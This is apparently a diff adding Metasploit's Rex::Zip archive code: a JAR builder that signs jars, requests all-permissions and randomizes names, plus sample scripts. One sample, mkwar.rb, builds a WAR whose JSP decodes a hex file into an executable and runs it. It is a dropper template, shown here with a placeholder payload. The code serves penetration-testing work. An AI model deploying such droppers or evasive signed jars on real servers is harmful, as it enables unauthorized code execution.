+    app_name = (opts[:app_name] ? randomize(opts[:main_class]) : nil)
+    existing_manifest = nil
+    @manifest =  "Manifest-Version: 1.0\r\n"
+    @manifest << "Main-Class: #{main_class}\r\n" if main_class
+    @manifest << "Application-Name: #{app_name}\r\n" if app_name
+    @manifest << "Permissions: all-permissions\r\n"
+    @manifest << "\r\n"
+    @entries.each { |e|
+      next if e.name =~ %r|/$|
+      if e.name == "META-INF/MANIFEST.MF"
+        existing_manifest = e
+        next
+      end
+      #next unless e.name =~ /\.class$/
+      @manifest << "Name: #{e.name}\r\n"
+      #@manifest << "SHA1-Digest: #{Digest::SHA1.base64digest(e.data)}\r\n"
+      @manifest << "\r\n"
+    }
+    if existing_manifest
+      existing_manifest.data = @manifest
+    else
+      add_file("META-INF/", '')
+      add_file("META-INF/MANIFEST.MF", @manifest)
+    end
+  end
+  def to_s
+    pack
+  end
+  #
+  # Length of the *compressed* blob
+  #
+  def length
+    pack.length
+  end
+  #
+  # Add multiple files from an array
+  #
+  # +files+ should be structured like so:
+  #   [
+  #     [ "path", "to", "file1" ],
+  #     [ "path", "to", "file2" ]
+  #   ]
+  # and +path+ should be the location on the file system to find the files to
+  # add.  +base_dir+ will be prepended to the path inside the jar.
+  #
+  # Example:
+  #   war = Rex::Zip::Jar.new
+  #   war.add_file("WEB-INF/", '')
+  #   war.add_file("WEB-INF/web.xml", web_xml)
+  #   war.add_file("WEB-INF/classes/", '')
+  #   files = [
+  #     [ "servlet", "examples", "HelloWorld.class" ],
+  #     [ "Foo.class" ],
+  #     [ "servlet", "Bar.class" ],
+  #   ]
+  #   war.add_files(files, "./class_files/", "WEB-INF/classes/")
+  #
+  # The above code would create a jar with the following structure from files
+  # found in ./class_files/ :
+  #
+  #   +- WEB-INF/
+  #     +- web.xml
+  #     +- classes/
+  #       +- Foo.class
+  #       +- servlet/
+  #         +- Bar.class
+  #         +- examples/
+  #           +- HelloWorld.class
+  #
+  def add_files(files, path, base_dir="")
+    files.each do |file|
+      # Add all of the subdirectories if they don't already exist
+      1.upto(file.length - 1) do |idx|
+        full = base_dir + file[0,idx].join("/") + "/"
+        if !(entries.map{|e|e.name}.include?(full))
+          add_file(full, '')
+        end
+      end
+      # Now add the actual file, grabbing data from the filesystem
+      fd = File.open(File.join( path, file ), "rb")
+      data = fd.read(fd.stat.size)
+      fd.close
+      add_file(base_dir + file.join("/"), data)
+    end
+  end
+  #
+  # Add a signature to this jar given a +key+ and a +cert+.  +cert+ should be
+  # an instance of OpenSSL::X509::Certificate and +key+ is expected to be an
+  # instance of one of OpenSSL::PKey::DSA or OpenSSL::PKey::RSA.
+  #
+  # This method aims to create signature files compatible with the jarsigner
+  # tool destributed with the JDK and any JVM should accept the resulting
+  # jar.
+  #
+  # === Signature contents
+  # Modifies the META-INF/MANIFEST.MF entry adding SHA1-Digest attributes in
+  # each Name section.  The signature consists of two files, a .SF and a .DSA
+  # (or .RSA if signing with an RSA key).  The .SF file is similar to the
+  # manifest with Name sections but the SHA1-Digest is not optional.  The
+  # difference is in what gets hashed for the SHA1-Digest line -- in the
+  # manifest, it is the file's contents, in the .SF, it is the file's section
+  # in the manifest (including trailing newline!).  The .DSA/.RSA file is a
+  # PKCS7 signature of the .SF file contents.
+  #
+  # === Links
+  # A short description of the format:
+  # http://download.oracle.com/javase/1.4.2/docs/guide/jar/jar.html#Signed%20JAR%20File
+  #
+  # Some info on importing a private key into a keystore which is not
+  # directly supported by keytool for some unfathomable reason
+  # http://www.agentbob.info/agentbob/79-AB.html
+  #
+  def sign(key, cert, ca_certs=nil)
+    m = self.entries.find { |e| e.name == "META-INF/MANIFEST.MF" }
+    raise RuntimeError.new("Jar has no manifest") unless m
+    ca_certs ||= [ cert ]
+    new_manifest = ''
+    sigdata =  "Signature-Version: 1.0\r\n"
+    sigdata << "Created-By: 1.6.0_18 (Sun Microsystems Inc.)\r\n"
+    sigdata << "\r\n"
+    # Grab the sections of the manifest
+    files = m.data.split(/\r?\n\r?\n/)
+    if files[0] =~ /Manifest-Version/
+      # keep the header as is
+      new_manifest << files[0]
+      new_manifest << "\r\n\r\n"
+      files = files[1,files.length]
+    end
+    # The file sections should now look like this:
+    #  "Name: metasploit/Payload.class\r\nSHA1-Digest: KbAIMttBcLp1zCewA2ERYkcnRU8=\r\n\r\n"
+    files.each do |f|
+      next unless f =~ /Name: (.*)/
+      name = $1
+      e = self.entries.find { |e| e.name == name }
+      if e
+        digest = OpenSSL::Digest::SHA1.digest(e.data)
+        manifest_section =  "Name: #{name}\r\n"
+        manifest_section << "SHA1-Digest: #{[digest].pack('m').strip}\r\n"
+        manifest_section << "\r\n"
+        manifest_digest = OpenSSL::Digest::SHA1.digest(manifest_section)
+        sigdata << "Name: #{name}\r\n"
+        sigdata << "SHA1-Digest: #{[manifest_digest].pack('m')}\r\n"
+        new_manifest << manifest_section
+      end
+    end
+    # Now overwrite with the new manifest
+    m.data = new_manifest
+    flags = 0
+    flags |= OpenSSL::PKCS7::BINARY
+    flags |= OpenSSL::PKCS7::DETACHED
+    # SMIME and ATTRs are technically valid in the signature but they
+    # both screw up the java verifier, so don't include them.
+    flags |= OpenSSL::PKCS7::NOSMIMECAP
+    flags |= OpenSSL::PKCS7::NOATTR
+    signature = OpenSSL::PKCS7.sign(cert, key, sigdata, ca_certs, flags)
+    sigalg = case key
+      when OpenSSL::PKey::RSA; "RSA"
+      when OpenSSL::PKey::DSA; "DSA"
+      # Don't really know what to do if it's not DSA or RSA.  Can
+      # OpenSSL::PKCS7 actually sign stuff with it in that case?
+      # Regardless, the java spec says signatures can only be RSA,
+      # DSA, or PGP, so just assume it's PGP and hope for the best
+      else; "PGP"
+      end
+    # SIGNFILE is the default name in documentation.  MYKEY is probably
+    # more common, though because that's what keytool defaults to.  We
+    # can probably randomize this with no ill effects.
+    add_file("META-INF/SIGNFILE.SF", sigdata)
+    add_file("META-INF/SIGNFILE.#{sigalg}", signature.to_der)
+    return true
+  end
+  # Adds a file to the JAR, randomizing the file name
+  # and the contents.
+  #
+  # @see Rex::Zip::Archive#add_file
+  def add_file(fname, fdata=nil, xtra=nil, comment=nil)
+    super(randomize(fname), randomize(fdata), xtra, comment)
+  end
+  # Adds a substitution to have into account when randomizing. Substitutions
+  # must be added immediately after {#initialize}.
+  #
+  # @param str [String] String to substitute. It's designed to randomize
+  #   class and/or package names.
+  # @param bad [String] String containing bad characters to avoid when
+  #   applying substitutions.
+  # @return [String] The substitution which will be used when randomizing.
+  def add_sub(str, bad = '')
+    if @substitutions.key?(str)
+      return @substitutions[str]
+    end
+    @substitutions[str] = Rex::Text.rand_text_alpha(str.length, bad)
+  end
+  # Randomizes an input by applying the `substitutions` available.
+  #
+  # @param str [String] String to randomize.
+  # @return [String] The input `str` with all the possible `substitutions`
+  #   applied.
+  def randomize(str)
+    return str if str.nil?
+    random = str
+    @substitutions.each do |orig, subs|
+      random = str.gsub(orig, subs)
+    end
+    random
+  end
+end
+end
+end

data/lib/rex/zip/samples/comment.rb ADDED

@@ -0,0 +1,32 @@
+# -*- coding: binary -*-
+#
+# Create a zip file with comments!
+#
+msfbase = __FILE__
+while File.symlink?(msfbase)
+  msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase))
+end
+inc = File.dirname(msfbase) + '/../../..'
+$:.unshift(inc)
+require 'rex/zip'
+# example usage
+zip = Rex::Zip::Archive.new
+zip.add_file("elite.txt", "A" * 1024, nil, %Q<
+                                 +---------------+
+                                 | file comment! |
+                                 +---------------+
+>)
+zip.set_comment(%Q<
++------------------------------------------+
+|                                          |
+| Hello!  This is the Zip Archive comment! |
+|                                          |
++------------------------------------------+
+>)
+zip.save_to("lolz.zip")

data/lib/rex/zip/samples/mkwar.rb ADDED

@@ -0,0 +1,138 @@
+# -*- coding: binary -*-
+#
+# Create a WAR archive!
+#
+msfbase = __FILE__
+while File.symlink?(msfbase)
+  msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase))
+end
+inc = File.dirname(msfbase) + '/../../..'
+$:.unshift(inc)
+require 'rex/zip'
+def rand_text_alpha(len)
+  buff = ""
+  foo = []
+  foo += ('A' .. 'Z').to_a
+  foo += ('a' .. 'z').to_a
+  # Generate a buffer from the remaining bytes
+  if foo.length >= 256
+    len.times { buff << Kernel.rand(256) }
+  else
+    len.times { buff << foo[ rand(foo.length) ] }
+  end
+  return buff
+end
+exe = "exe " * 1024
+var_payload = "var_payload"
+var_name = "var_name"
+zip = Rex::Zip::Archive.new
+# begin meta-inf/
+minf = [ 0xcafe, 0x0003 ].pack('Vv')
+zip.add_file('META-INF/', nil, minf)
+# end meta-inf/
+# begin meta-inf/manifest.mf
+mfraw = "Manifest-Version: 1.0\r\nCreated-By: 1.6.0_17 (Sun Microsystems Inc.)\r\n\r\n"
+zip.add_file('META-INF/MANIFEST.MF', mfraw)
+# end meta-inf/manifest.mf
+# begin web-inf/
+zip.add_file('WEB-INF/', '')
+# end web-inf/
+# begin web-inf/web.xml
+webxmlraw = %q{<?xml version="1.0" ?>
+<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
+xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
+http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
+version="2.4">
+<servlet>
+<servlet-name>NAME</servlet-name>
+<jsp-file>/PAYLOAD.jsp</jsp-file>
+</servlet>
+</web-app>
+}
+webxmlraw.gsub!(/NAME/, var_name)
+webxmlraw.gsub!(/PAYLOAD/, var_payload)
+zip.add_file('WEB-INF/web.xml', webxmlraw)
+# end web-inf/web.xml
+# begin <payload>.jsp
+var_hexpath       = rand_text_alpha(rand(8)+8)
+var_exepath       = rand_text_alpha(rand(8)+8)
+var_data          = rand_text_alpha(rand(8)+8)
+var_inputstream   = rand_text_alpha(rand(8)+8)
+var_outputstream  = rand_text_alpha(rand(8)+8)
+var_numbytes      = rand_text_alpha(rand(8)+8)
+var_bytearray     = rand_text_alpha(rand(8)+8)
+var_bytes         = rand_text_alpha(rand(8)+8)
+var_counter       = rand_text_alpha(rand(8)+8)
+var_char1         = rand_text_alpha(rand(8)+8)
+var_char2         = rand_text_alpha(rand(8)+8)
+var_comb          = rand_text_alpha(rand(8)+8)
+var_exe           = rand_text_alpha(rand(8)+8)
+var_hexfile       = rand_text_alpha(rand(8)+8)
+var_proc          = rand_text_alpha(rand(8)+8)
+jspraw =  "<%@ page import=\"java.io.*\" %>\n"
+jspraw << "<%\n"
+jspraw << "String #{var_hexpath} = application.getRealPath(\"/\") + \"#{var_hexfile}.txt\";\n"
+jspraw << "String #{var_exepath} = System.getProperty(\"java.io.tmpdir\") + \"/#{var_exe}\";\n"
+jspraw << "String #{var_data} = \"\";\n"
+jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1){\n"
+jspraw << "#{var_exepath} = #{var_exepath}.concat(\".exe\");\n"
+jspraw << "}\n"
+jspraw << "FileInputStream #{var_inputstream} = new FileInputStream(#{var_hexpath});\n"
+jspraw << "FileOutputStream #{var_outputstream} = new FileOutputStream(#{var_exepath});\n"
+jspraw << "int #{var_numbytes} = #{var_inputstream}.available();\n"
+jspraw << "byte #{var_bytearray}[] = new byte[#{var_numbytes}];\n"
+jspraw << "#{var_inputstream}.read(#{var_bytearray});\n"
+jspraw << "#{var_inputstream}.close();\n"
+jspraw << "byte[] #{var_bytes} = new byte[#{var_numbytes}/2];\n"
+jspraw << "for (int #{var_counter} = 0; #{var_counter} < #{var_numbytes}; #{var_counter} += 2)\n"
+jspraw << "{\n"
+jspraw << "char #{var_char1} = (char) #{var_bytearray}[#{var_counter}];\n"
+jspraw << "char #{var_char2} = (char) #{var_bytearray}[#{var_counter} + 1];\n"
+jspraw << "int #{var_comb} = Character.digit(#{var_char1}, 16) & 0xff;\n"
+jspraw << "#{var_comb} <<= 4;\n"
+jspraw << "#{var_comb} += Character.digit(#{var_char2}, 16) & 0xff;\n"
+jspraw << "#{var_bytes}[#{var_counter}/2] = (byte)#{var_comb};\n"
+jspraw << "}\n"
+jspraw << "#{var_outputstream}.write(#{var_bytes});\n"
+jspraw << "#{var_outputstream}.close();\n"
+jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n"
+jspraw << "%>\n"
+zip.add_file("#{var_payload}.jsp", jspraw)
+# end <payload>.jsp
+# begin <payload>.txt
+payloadraw = exe.unpack('H*')[0]
+zip.add_file("#{var_hexfile}.txt", payloadraw)
+# end <payload>.txt
+zip.save_to("test.war")